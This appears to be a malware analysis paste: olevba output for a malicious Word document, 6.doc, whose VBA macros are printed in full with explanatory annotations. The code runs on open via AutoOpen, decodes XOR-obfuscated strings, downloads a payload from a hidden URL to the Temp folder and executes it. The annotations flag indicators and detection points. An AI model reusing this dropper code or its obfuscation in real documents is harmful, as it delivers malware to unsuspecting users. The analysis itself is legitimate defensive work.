dynamoo

Malicious Word macro

Apr 24th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 6.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 6.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 6.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
      ' Thin wrapper: the Long argument (443 from autoopen) is never read; the only
      ' effect is the call into HARRIS (CLAY module), the next link of the chain.
  16. Sub TRENTON(MARCELINO As Long)
  17. HARRIS
  18. End Sub
  19.  
      ' Entry point. Word runs AutoOpen as soon as the document is opened with macros
      ' enabled (see ANALYSIS below), so the whole chain
      ' TRENTON -> HARRIS -> FREDERIC -> MERRILL -> CLEMENT -> JARVIS runs with no
      ' further user action. Blocking macros in documents that arrive from the
      ' internet, or requiring signed macros, stops everything at this line.
  20. Sub autoopen()
  21. TRENTON (443)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: 6.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
      ' 64-bit import of wininet!InternetOpenUrlA under an arbitrary name; the
      ' 32-bit counterpart is in the LAMAR module under #Else. Spreading the four
      ' wininet declares over several modules keeps any single stream from looking
      ' like a complete downloader.
  35. #If VBA7 And Win64 Then
  36. Public Declare PtrSafe Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As LongPtr, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
  37. #End If
  38.  
  39.  
      ' Execution stage. Creates a COM object whose ProgID is BENNETT's XOR-decode of
      ' the hex constant CORNELL with key OCTAVIO (hand-decoding gives
      ' Shell.Application - verify), then calls .Open on folder & filename, i.e. it
      ' launches the file RIGOBERTO just wrote. VAUGHN is never read and the Boolean
      ' result is never assigned (always False). AVERY is undeclared; this module has
      ' no Option Explicit.
  40. Public Function GENARO(ByRef GRAHAM As Object, ByRef ISAIAH As String, VAUGHN As Double) As Boolean
  41. 
  42. Set AVERY = CreateObject _
  43. (BENNETT _
  44. (OCTAVIO, CORNELL))
  45. Dim NORRIS As Integer
      ' Default-property concatenation of the folder object and the file name.
  46. NORRIS = AVERY.Open(GRAHAM & ISAIAH)
  47. End Function
  48.  
  49.  
      ' Pass-through to the string decoder BENNETT(key, hex). DERICK is dead
      ' arithmetic on an unused argument. Callers: CLIFF (URL from WINFRED) and
      ' JARVIS (file name from AURELIO).
  50. Public Function GONZALO(DERICK As Long, RODRIGO As String, STACEY As String) As String
  51. DERICK = DERICK * 2
  52. GONZALO = BENNETT(RODRIGO, STACEY)
  53.    
  54. End Function
  55.  
  56. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  57. ANALYSIS:
  58. +------------+----------------+-----------------------------------------+
  59. | Type       | Keyword        | Description                             |
  60. +------------+----------------+-----------------------------------------+
  61. | Suspicious | CreateObject   | May create an OLE object                |
  62. | Suspicious | Lib            | May run code from a DLL                 |
  63. | Suspicious | Open           | May open a file                         |
  64. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  65. |            |                | may be used to obfuscate strings        |
  66. |            |                | (option --decode to see all)            |
  67. | IOC        | wininet.dll    | Executable file name                    |
  68. +------------+----------------+-----------------------------------------+
  69. -------------------------------------------------------------------------------
  70. VBA MACRO CLAY.bas
  71. in file: 6.doc - OLE stream: u'Macros/VBA/CLAY'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73.  
      ' 64-bit import of wininet!InternetOpenA (32-bit version in LAMAR). EFRAIN calls
      ' it with the fixed user agent MOHAMMAD.
  74. #If VBA7 And Win64 Then
  75. Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
  76. #End If
      ' Returns byte GIOVANNI of a hex string: BERNIE extracts the two characters at
      ' position 2*GIOVANNI-1 (FLETCHER) and Val("&H" & ...) parses them as hex.
  77. Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
  78.  GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
  79. End Function
      ' Maps a 1-based byte index to the 1-based position of its first hex digit
      ' (1 -> 1, 2 -> 3, 3 -> 5, ...).
  80. Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
  81.  FLETCHER = (2 * GIOVANNI) - 1
  82. End Function
  83.  
  84.  
      ' String decoder behind every obfuscated constant. WILMER is a hex string,
      ' HERSCHEL the key (OCTAVIO at every call site). Byte i of the hex string is
      ' XORed with the key character chosen by LAVERNE, (i Mod Len(key)) + 1, so the
      ' key cycles starting from its second character. Recovering the ProgIDs, file
      ' name and URL for IoC purposes is a matter of replaying this loop offline.
  85. Public Function BENNETT(HERSCHEL As String, WILMER As String) As String
  86.    
  87.     Dim NUMBERS As Integer
  88.     Dim BUFORD As Integer
  89.    
  90.    
  91.     Dim SANFORD As Long
  92.  SANFORD = 221
      ' 221 > 884 is never true, so End never executes: dead guard / padding.
  93. If SANFORD > SANFORD * 4 Then End
  94.    
  95.     Dim GIOVANNI As Long
  96.     Dim BARNEY As String
      ' One iteration per encoded byte (two hex digits).
  97.     For GIOVANNI = 1 To (NESTOR(WILMER) / 2)
      ' NUMBERS = hex byte i, BUFORD = key byte, BRANDEN = Chr(NUMBERS Xor BUFORD).
  98.         NUMBERS = GERMAN(WILMER, GIOVANNI)
  99.         BUFORD = LAVERNE(HERSCHEL, GIOVANNI)
  100.         BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)
  101.     Next GIOVANNI
  102.    BENNETT = BARNEY
  103. End Function
  104.  
  105.  
  106.  
      ' Second link of the chain. Everything except the FREDERIC call is filler:
      ' BERT is unused and the loop body pushes SILAS past 68 so it runs once.
      ' FREDERIC is in CORNELIUS; its Double argument is ignored.
  107. Public Sub HARRIS()
  108.         Dim BERT As Double
  109. 
  110.     Dim SILAS As Double
  111. For SILAS = 67 To 68
  112. SILAS = SILAS + 99
  113. Next SILAS
  114. 
  115. FREDERIC (5.09)
  116. 
  117. End Sub
      ' Fourth link. The IRWIN string work is junk; the only effect is the call to
      ' CLEMENT (ROLANDO), whose Double argument is likewise ignored. Declared as a
      ' Function with no return type and never assigned.
  118. Public Function MERRILL(MERLIN As String)
  119. Dim IRWIN As String
  120. IRWIN = "KIRBY"
  121. CLEMENT 44 + 0.33
  122. IRWIN = IRWIN + "CRUZ"
  123. End Function
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  131. ANALYSIS:
  132. +------------+----------------+-----------------------------------------+
  133. | Type       | Keyword        | Description                             |
  134. +------------+----------------+-----------------------------------------+
  135. | Suspicious | Lib            | May run code from a DLL                 |
  136. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  137. |            |                | may be used to obfuscate strings        |
  138. |            |                | (option --decode to see all)            |
  139. | IOC        | wininet.dll    | Executable file name                    |
  140. +------------+----------------+-----------------------------------------+
  141. -------------------------------------------------------------------------------
  142. VBA MACRO ROLANDO.bas
  143. in file: 6.doc - OLE stream: u'Macros/VBA/ROLANDO'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  145.  
  146.  
  147.  
      ' Download stage: fetches the URL that CLIFF decodes and writes the response
      ' body to the file path SHELBY (Temp folder & file name, supplied by JARVIS).
      ' ALPHONSO is never read. Returns True only if at least one byte arrived.
      ' RICKIE is the WinINet session handle, BOBBIE the request handle.
  148. Public Function RIGOBERTO(ALPHONSO As Long, ByVal SHELBY As String) As Boolean
  149.     #If VBA7 And Win64 Then
  150.         Dim RICKIE As LongPtr, BOBBIE As LongPtr
  151.     #Else
  152.         Dim RICKIE As Long, BOBBIE As Long
  153.     #End If
  154.     Dim MAURICIO As Long
      ' SONNY is a fixed-length 4800-byte read buffer (PASQUALE, CORNELIUS module).
  155.     Dim SONNY As String * PASQUALE, DALTON As String
  156.     Dim QUINCY As Integer, SEBASTIAN As Double
      ' InternetOpenA with user agent MOHAMMAD ("LEONEL").
  157.     RICKIE = EFRAIN
  158.     If RICKIE = 0 Then
  159.         Exit Function
  160.     End If
  161.     Dim FEDERICO As Boolean
  162.    
      ' CLIFF opens the URL into BOBBIE via InternetOpenUrlA. Its (always True)
      ' result is discarded; success is judged by BOBBIE <> 0 below.
  163.     If CLIFF(BOBBIE, RICKIE) Then
  164.     End If
  165.     If BOBBIE = 0 Then
  166.         SEBASTIAN = 0
  167.     Else
      ' First InternetReadFile. DALTON takes the whole 4800-byte buffer rather than
      ' only the MAURICIO bytes actually read, so a short first chunk leaves
      ' padding in the written file - a quirk worth knowing when hashing dropped
      ' samples.
  168.         ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
  169.         DALTON = SONNY
  170.           Dim JACKSON As Integer
  171.           JACKSON = 0
  172.           JACKSON = JACKSON + 33
      ' 33 > 73 is never true; dead guard.
  173. If JACKSON > JACKSON + 40 Then End
      ' Remaining chunks: loop until InternetReadFile reports 0 bytes, appending
      ' only the bytes actually read.
  174.         Do While MAURICIO <> 0
  175.             ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
  176.                     DALTON = DALTON + Mid(SONNY, 1, MAURICIO)
  177.         Loop
      ' SEBASTIAN = bytes received; QUINCY = FreeFile (DONNELL ignores its argument).
  178.              SEBASTIAN = NESTOR(DALTON): _
  179.              QUINCY = DONNELL("DAVIS")
      ' Binary write of the payload to SHELBY. WINWORD.EXE creating a file in the
      ' user's Temp folder, followed by a child process launch from there, is the
      ' observable sequence to alert on.
  180.         Open SHELBY _
  181.             For Binary Access Write _
  182.         Lock Write As #QUINCY
  183.         Put #QUINCY, , DALTON
  184.         JACKSON = JACKSON + 62
      ' JACKSON is 95 here; never true.
  185.     If JACKSON < 0 Then End
  186.         Close #QUINCY
  187.     End If
      ' InternetCloseHandle on the request and session handles.
  188.     GAVIN BOBBIE
  189.     GAVIN RICKIE
  190.     DALTON = ""
  191.     If SEBASTIAN Then
  192.         RIGOBERTO = True
  193.     End If
  194. End Function
  195.  
      ' Fifth link. The local `Dim GONZALO As Object` shadows the GONZALO function
      ' inside this procedure; it is passed uninitialised (Nothing) as JARVIS's
      ' ByRef first argument, which JARVIS then Sets to the Temp folder object.
      ' ELLIS = LAURENCE() is the COM object built from the decoded COLLIN constant.
      ' The loops and comparisons are filler; MAXWELL > MAXWELL * 333 is never true
      ' for a positive MAXWELL, and ODELL is dead arithmetic on the argument.
  196. Public Function CLEMENT(ODELL As Double)
  197. 
  198. Dim GONZALO As Object
  199. 
  200. 
  201.     Dim MAXWELL As Long
  202. For MAXWELL = 16 To 17
  203. MAXWELL = MAXWELL + 17
  204. Next MAXWELL
  205.    
  206. 
  207. Dim ELLIS  As Object
  208. 
  209. 
  210. For MAXWELL = 11 To 21
  211. MAXWELL = MAXWELL + 64
  212. Next MAXWELL
  213.    
  214. 
  215. Set ELLIS = LAURENCE
  216. MAXWELL = MAXWELL + 35
  217. Dim LEWIS As Boolean
  218. 
  219. If MAXWELL > MAXWELL * 333 Then End
      ' Hands off to the download-and-run orchestrator (AMOS module).
  220. LEWIS = JARVIS(GONZALO, ELLIS)
  221. ODELL = ODELL + 14
  222. End Function
  223.  
  224.  
  225. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  226. ANALYSIS:
  227. +------------+---------+-----------------------------------------+
  228. | Type       | Keyword | Description                             |
  229. +------------+---------+-----------------------------------------+
  230. | Suspicious | Open    | May open a file                         |
  231. | Suspicious | Write   | May write to a file (if combined with   |
  232. |            |         | Open)                                   |
  233. | Suspicious | Put     | May write to a file (if combined with   |
  234. |            |         | Open)                                   |
  235. | Suspicious | Binary  | May read or write a binary file (if     |
  236. |            |         | combined with Open)                     |
  237. +------------+---------+-----------------------------------------+
  238. -------------------------------------------------------------------------------
  239. VBA MACRO CORNELIUS.bas
  240. in file: 6.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  241. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  242.  
      ' The only module with Option Explicit; the others leave locals undeclared.
  243. Option Explicit
  244. 
      ' 64-bit import of wininet!InternetReadFile (32-bit version in LAMAR).
  245. #If VBA7 And Win64 Then
  246. Public Declare PtrSafe Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  247. #End If
      ' Hex-encoded strings, XOR-obfuscated against the key OCTAVIO and decoded by
      ' BENNETT at run time. CORNELL -> COM ProgID used by GENARO to run the payload
      ' (hand decode: Shell.Application); AURELIO -> dropped file name (JARVIS);
      ' WINFRED -> download URL (CLIFF); COLLIN -> COM ProgID used by LAURENCE
      ' (hand decode: Scripting.FileSystemObject). Re-derive before relying on them.
  248. Public Const CORNELL = "062F303F38670F3529233C2D2642283A29"
  249. Public Const AURELIO = "09373C36263B2B73772A2D2B"
  250. Public Const WINFRED = "3D3321236E6661273C3F3827295E223D2E7B303B24617D6A60637F69533930"
  251. Public Const COLLIN = "0624273A243D272B3E6113272B53122C34213639062C2F3C2C21"
  252. Public Const OCTAVIO = "AUGUSTINEYOUNG6"
  253. 
  254. 
  255. 
      ' Read-buffer size in bytes for InternetReadFile (RIGOBERTO).
  256. Public Const PASQUALE = 4800
      ' User-Agent handed to InternetOpenA. A fixed non-browser UA like this is a
      ' straightforward proxy/web-log detection.
  257. Public Const MOHAMMAD As String = "LEONEL"
      ' dwAccessType for InternetOpenA; 1 corresponds to INTERNET_OPEN_TYPE_DIRECT
      ' in WinINet (verify against the SDK headers).
  258. Public Const MARIANO = 1
      ' dwFlags for InternetOpenUrlA; &H4000000 corresponds to
      ' INTERNET_FLAG_NO_CACHE_WRITE (verify), so the payload should not be expected
      ' in the WinINet cache during forensics.
  259. Public Const DANIAL = &H4000000
  260.  
      ' Third link: calls MERRILL (CLAY) with a fixed dummy string. SANTOS is ignored.
  261. Sub FREDERIC(SANTOS As Double)
  262. 
  263. MERRILL ("BLAIRLANDON")
  264. End Sub
  265.  
      ' One step of the decoder: XORs a hex byte with a key byte and returns the
      ' resulting character (see BENNETT).
  266. Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  267.     BRANDEN = Chr(NUMBERS Xor BUFORD)
  268. End Function
  269.  
  270.  
  271.  
  272.  
  273.  
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275. ANALYSIS:
  276. +------------+----------------+-----------------------------------------+
  277. | Type       | Keyword        | Description                             |
  278. +------------+----------------+-----------------------------------------+
  279. | Suspicious | Lib            | May run code from a DLL                 |
  280. | Suspicious | Chr            | May attempt to obfuscate specific       |
  281. |            |                | strings                                 |
  282. | Suspicious | Xor            | May attempt to obfuscate specific       |
  283. |            |                | strings                                 |
  284. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  285. |            |                | be used to obfuscate strings (option    |
  286. |            |                | --decode to see all)                    |
  287. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  288. |            |                | may be used to obfuscate strings        |
  289. |            |                | (option --decode to see all)            |
  290. | IOC        | wininet.dll    | Executable file name                    |
  291. +------------+----------------+-----------------------------------------+
  292. -------------------------------------------------------------------------------
  293. VBA MACRO LAMAR.bas
  294. in file: 6.doc - OLE stream: u'Macros/VBA/LAMAR'
  295. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  296.  
  297.  
  298.  
  299.  
      ' JASPER is never referenced in the visible code. The #Else branch holds the
      ' 32-bit (non-PtrSafe, Long-handle) imports of the same four wininet functions
      ' that PERCY, CLAY, CORNELIUS and AMOS declare PtrSafe for 64-bit Office; on
      ' 64-bit the empty #If branch means this module contributes nothing.
  300. Public Const JASPER = "RUSSEL"
  301. #If VBA7 And Win64 Then
  302. #Else
  303. Public Declare Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
  304. Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
  305. Public Declare Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  306. Public Declare Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As Long, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
  307. #End If
  308.  
  309.  
      ' Key-byte selector for BENNETT: ASCII of the key character at position
      ' (GIOVANNI Mod Len(key)) + 1, so the key wraps and the first byte uses the
      ' key's second character.
  310. Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
  311. LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod NESTOR(HERSCHEL)) + 1), 1))
  312. End Function
      ' Mid$ wrapper: substring of JAYSON starting at NUMBERS, BUFORD characters
      ' long. SAMMY is dead arithmetic; the literal first argument at both call sites
      ' (62 in GERMAN, 71 in LAVERNE) carries no meaning.
  313. Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  314.     BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
  315.     SAMMY = SAMMY + 31
  316. End Function
      ' Returns a WinINet session handle: InternetOpenA(lpszAgent = MOHAMMAD
      ' ("LEONEL"), dwAccessType = MARIANO (1), no proxy, no bypass list, flags 0).
      ' The line-continued #If only switches the return type between LongPtr and
      ' Long.
  317. #If VBA7 _
  318.     And Win64 Then
  319. Public Function EFRAIN() As LongPtr
  320.  #Else
  321. Public Function EFRAIN() As Long
  322. 
  323.  #End If
  324. 
  325.  EFRAIN = SAMMIE(MOHAMMAD, MARIANO, vbNullString, vbNullString, 0)
  326. End Function
  327.  
      ' Len wrapper, used for the hex-string length in BENNETT/LAVERNE and for the
      ' downloaded byte count in RIGOBERTO.
  328. Public Function NESTOR(JAYSON As String) As Long
  329. NESTOR = Len(JAYSON)
  330. End Function
  331.  
  332.  
  333.  
  334.  
  335.  
  336. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  337. ANALYSIS:
  338. +------------+----------------+-----------------------------------------+
  339. | Type       | Keyword        | Description                             |
  340. +------------+----------------+-----------------------------------------+
  341. | Suspicious | Lib            | May run code from a DLL                 |
  342. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  343. |            |                | may be used to obfuscate strings        |
  344. |            |                | (option --decode to see all)            |
  345. | IOC        | wininet.dll    | Executable file name                    |
  346. +------------+----------------+-----------------------------------------+
  347. -------------------------------------------------------------------------------
  348. VBA MACRO DEXTER.bas
  349. in file: 6.doc - OLE stream: u'Macros/VBA/DEXTER'
  350. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  351.  
  352.  
      ' Creates the COM object named by decoding COLLIN with key OCTAVIO (hand
      ' decode: Scripting.FileSystemObject - verify). JARVIS passes it to IGNACIO to
      ' obtain the drop folder; CLEMENT also passes one as JARVIS's second argument.
  353. Public Function LAURENCE() As Object
  354. Dim ISMAEL As String
  355. ISMAEL = BENNETT(OCTAVIO, COLLIN)
  356. Set LAURENCE = CreateObject(ISMAEL)
  357. End Function
      ' Opens the download URL. GUADALUPE is the decode of WINFRED with key OCTAVIO
      ' (the network IoC; replay BENNETT offline to recover it). GRADY receives the
      ' request handle from InternetOpenUrlA(session NOAH, url, no headers, 0,
      ' flags DANIAL, context 0). Always returns True, so callers cannot use the
      ' result for success; RIGOBERTO checks the handle instead. CLARK is unused and
      ' the JACQUES loop is filler.
  358. #If VBA7 And Win64 Then
  359.        Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  360.     #Else
  361.        Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean
  362.     #End If
  363.         Dim JACQUES As Double
  364. Dim GUADALUPE As String
  365. Dim CLARK As Long
  366.     GUADALUPE = GONZALO(893, OCTAVIO, WINFRED)
  367. 
  368. For JACQUES = 14 To 15
  369. JACQUES = JACQUES + 5.5
  370. Next JACQUES
  371.     GRADY = MICHEL(NOAH, GUADALUPE, vbNullString, 0, DANIAL, 0)
  372.     CLIFF = True
  373. End Function
  374.  
  375.  
  376. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  377. ANALYSIS:
  378. +------------+--------------+--------------------------+
  379. | Type       | Keyword      | Description              |
  380. +------------+--------------+--------------------------+
  381. | Suspicious | CreateObject | May create an OLE object |
  382. +------------+--------------+--------------------------+
  383. -------------------------------------------------------------------------------
  384. VBA MACRO AMOS.bas
  385. in file: 6.doc - OLE stream: u'Macros/VBA/AMOS'
  386. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  387.  
  388.  
      ' 64-bit import of wininet!InternetCloseHandle (handle passed ByRef; 32-bit
      ' version in LAMAR). Called twice at the end of RIGOBERTO.
  389. #If VBA7 And Win64 Then
  390. Public Declare PtrSafe Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
  391. #End If
  392.  
      ' Drop-and-run orchestrator. GRAHAM (ByRef, Nothing on entry from CLEMENT) is
      ' set to IGNACIO(LAURENCE()), i.e. GetSpecialFolder(2) - the Temp folder if
      ' LAURENCE yields a FileSystemObject. ISAIAH is the decoded AURELIO constant
      ' (the dropped file name). ADOLFO = GRAHAM & ISAIAH relies on the folder
      ' object's default property (its path) to form the full file path. RIGOBERTO
      ' downloads into it (result ignored), then GENARO opens/executes it and its
      ' result becomes JARVIS's return. HOMER is unused; the HARRISON loop is filler.
  393. Public Function JARVIS(ByRef GRAHAM As Object, ByRef HOMER As Object) As Boolean
  394. 
  395. Dim HARRISON As Long
  396. Set GRAHAM = IGNACIO(LAURENCE)
  397. 
  398. Dim ADOLFO
  399. 
  400. Dim ISAIAH As String
  401. ISAIAH = GONZALO(4096, OCTAVIO, AURELIO)
  402. 
  403. For HARRISON = 6 To 8
  404. HARRISON = HARRISON * 55
  405. Next HARRISON
  406. ADOLFO = GRAHAM & ISAIAH
  407. 
      ' Download to Temp; the Boolean result is discarded, so GENARO runs even if
      ' nothing was written.
  408. If RIGOBERTO(354, ADOLFO) Then
  409. End If
  410. 
  411. 
      ' Execute the dropped file.
  412. JARVIS = GENARO(GRAHAM, ISAIAH, 213)
  413. 
  414. End Function
      ' FreeFile wrapper; the string argument is ignored.
  415. Public Function DONNELL(JAYSON As String) As Integer
  416.     DONNELL = FreeFile
  417. End Function
  418.  
      ' Returns NICHOLAS.GetSpecialFolder(2). For Scripting.FileSystemObject, 2 is
      ' TemporaryFolder (verify) - the drop location used by JARVIS/RIGOBERTO.
  419. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  420. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  421. End Function
  422.  
  423. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  424. ANALYSIS:
  425. +------------+-------------+-------------------------+
  426. | Type       | Keyword     | Description             |
  427. +------------+-------------+-------------------------+
  428. | Suspicious | Lib         | May run code from a DLL |
  429. | IOC        | wininet.dll | Executable file name    |
  430. +------------+-------------+-------------------------+